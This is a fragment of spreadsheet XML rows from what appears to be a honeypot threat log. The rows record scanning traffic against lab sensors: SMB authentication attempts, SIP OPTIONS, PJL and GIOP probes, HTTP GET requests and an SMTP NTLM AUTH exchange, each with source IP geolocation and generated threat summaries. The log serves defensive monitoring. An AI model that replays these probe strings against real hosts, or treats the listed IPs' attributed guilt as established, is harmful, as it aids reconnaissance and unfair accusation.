(,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,43611)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,43559)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,64130)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,64180)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,28546)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,49459)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,49550)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,49656)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56945)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,52198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,54482)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,54548)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,63520)}&amp;&amp;{Data_SMB:Incoming connection (86.104.244.234,56671)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5668:f4ea"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="137"/>
    <x v="137"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:46:42"/>
    <d v="2025-04-30T06:42:34"/>
    <d v="2025-04-30T14:46:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c8:bec7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="138"/>
    <x v="138"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:43:21"/>
    <d v="2025-04-30T14:43:21"/>
    <d v="2025-04-30T14:43:21"/>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e:c554"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="139"/>
    <x v="139"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:29:44"/>
    <d v="2024-04-02T06:33:00"/>
    <d v="2025-04-30T14:29:44"/>
    <n v="266"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation&amp;&amp;Email Spoofing"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_POP3_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;443&amp;&amp;22&amp;&amp;1433&amp;&amp;110&amp;&amp;NA&amp;&amp;445&amp;&amp;23&amp;&amp;5432&amp;&amp;21&amp;&amp;3389&amp;&amp;9100&amp;&amp;25&amp;&amp;8443&amp;&amp;3306&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="141"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;request&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=35858'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.79.122:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=46895'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '209.145.61.177:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.181,47662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (eMzLmjAz,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.79.122:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=34219'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.118.77:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.181;rport=39813'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.8.76:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8db5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="The attacker is scanning for services and testing credentials on various systems, indicating a reconnaissance phase of an attack. They are also attempting to exploit vulnerabilities by sending malicious requests to different ports. &amp;&amp; An anonymous user is attempting to login to an FTP service, which could be a reconnaissance or malicious activity. The user has initiated the initial step of establishing a connection without providing any credentials beyond &quot;anonymous&quot;. This action may indicate an attempt to gain unauthorized access to sensitive files. &amp;&amp; This log indicates an attempt to connect to an FTP service using anonymous credentials, which could be a reconnaissance or initial step in a larger malicious attack. The attacker is likely attempting to establish a connection without proper authentication, potentially for further exploitation or data transfer. This activity may precede a brute-force login attempt or data exfiltration. &amp;&amp; A GET request is made to a server on port 9100 from an IP address, which could be a scan or reconnaissance attempt. _x000a_The requested URL and port number are unusual, suggesting potential malicious intent._x000a_This activity may indicate a probing operation. &amp;&amp; A GET request is being sent to a web server, possibly an attempt to scan or exploit the system with a specific host and port targeted. This could be reconnaissance or the first step in a larger attack. The target IP seems to be a non-standard web server configuration."/>
    <s v="Password cracking or Brute force &amp;&amp; Brute FTP &amp;&amp; Anonymous login &amp;&amp; Scan Attack &amp;&amp; Scanning Attack"/>
  </r>
  <r>
    <x v="140"/>
    <x v="140"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:24:46"/>
    <d v="2024-12-15T12:23:49"/>
    <d v="2025-04-30T14:24:46"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5491"/>
    <s v="77.2687"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="Abts Delhi"/>
    <s v="2006-12-19"/>
    <s v="ABTS-DSl-DEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa0:a7fa"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="141"/>
    <x v="141"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:16:39"/>
    <d v="2024-11-25T15:22:18"/>
    <d v="2025-04-30T14:16:39"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Industrial Layout)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.8884"/>
    <s v="77.6387"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS (Karnataka)"/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa6:1653"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="142"/>
    <x v="142"/>
    <s v="180-145-119-148f1.osk2.eonet.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-30T14:16:10"/>
    <d v="2025-04-29T18:44:14"/>
    <d v="2025-04-30T14:16:10"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="27"/>
    <s v="Osaka"/>
    <s v="Sakai"/>
    <s v="Sakai"/>
    <s v="1853195"/>
    <s v="NA"/>
    <s v="34.5822"/>
    <s v="135.467"/>
    <s v="17511"/>
    <s v="OPTAGE Inc."/>
    <s v="OPTAGE Inc."/>
    <s v="business"/>
    <s v="K-Opticom Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.eonet.ne.jp', 'ns7.eonet.ne.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/08/31)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b491:7794"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="143"/>
    <x v="143"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:15:31"/>
    <d v="2025-01-10T14:36:23"/>
    <d v="2025-04-30T14:15:31"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="BT"/>
    <s v="Banten"/>
    <s v="South Tangerang"/>
    <s v="South Tangerang"/>
    <s v="8581443"/>
    <s v="NA"/>
    <s v="-6.24439"/>
    <s v="106.777"/>
    <s v="141590"/>
    <s v="PT Tujuh Media Angkasa"/>
    <s v="PT. Tujuh Media Angkasa"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54398)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54410)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54026)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54030)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,54384)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,5522)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,5530)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,5893)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,49583)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50329)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,62683)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,59721)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,60412)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,49666)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,49689)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50082)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50466)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,50995)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,64848)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,65331)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,51193)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,51208)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,51644)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.158.22.123,28143)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679e:167b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An unknown device at IP address 103.158.22.123 attempted to connect to a shared resource on port 28143._x000a_This could be a scanning or probing attempt for vulnerabilities in the system._x000a_It may also be an attempt to exploit the system for unauthorized access. &amp;&amp; Malicious activity detected: A remote system attempted to establish a connection to an SMB service on our server from IP address 103.158.22.123 on port 28143. This could be an attempt to access or exploit the SMB service for unauthorized purposes."/>
    <s v="SMB Attack &amp;&amp; SMB Scan"/>
  </r>
  <r>
    <x v="144"/>
    <x v="144"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:15:18"/>
    <d v="2025-04-30T14:13:56"/>
    <d v="2025-04-30T14:15:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_HC1"/>
    <s v="5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Phú Lộc District"/>
    <s v="Phú Lộc"/>
    <s v="1570496"/>
    <s v="NA"/>
    <s v="16.2803"/>
    <s v="107.859"/>
    <s v="24086"/>
    <s v="Viettel Corporation"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7467:2e4f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="145"/>
    <x v="145"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T14:14:17"/>
    <d v="2023-07-28T03:18:27"/>
    <d v="2025-04-30T14:14:17"/>
    <n v="1108"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_IRC_H47&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;